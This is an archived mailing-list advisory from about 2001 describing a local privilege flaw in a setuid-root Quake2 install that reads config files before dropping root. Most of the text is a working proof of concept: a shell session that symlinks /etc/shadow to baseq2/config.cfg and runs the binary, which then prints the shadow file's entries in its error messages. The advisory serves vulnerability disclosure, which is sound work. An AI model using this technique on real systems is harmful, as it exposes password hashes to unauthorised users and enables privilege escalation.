Vulnerable: Everyone who followed the installation instructions and made Quake2 setuid root. Exploit: Quake2 reads its conf files (and .pak files) before giving up root, and it doesn't check the permissions before hand. nop@chrome:~> id uid=501(nop) gid=100(users) groups=100(users) nop@chrome:~> mkdir baseq2 nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg nop@chrome:~> ls -l /usr/games/quake/quake2 -rws--x--x 1 root root 303444 Feb 24 19:07 /usr/games/quake/quake2 nop@chrome:~> /usr/games/quake/quake2 couldn't exec default.cfg execing config.cfg Unknown command "root:[snip]:10137:0:99999:7:::" Unknown command "bin:*:9977:0:99999:7:::" Unknown command "daemon:*:9977:0:99999:7:::" Unknown command "adm:*:9977:0:99999:7:::" Unknown command "lp:*:9977:0:99999:7:::" [etc]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:15 PDT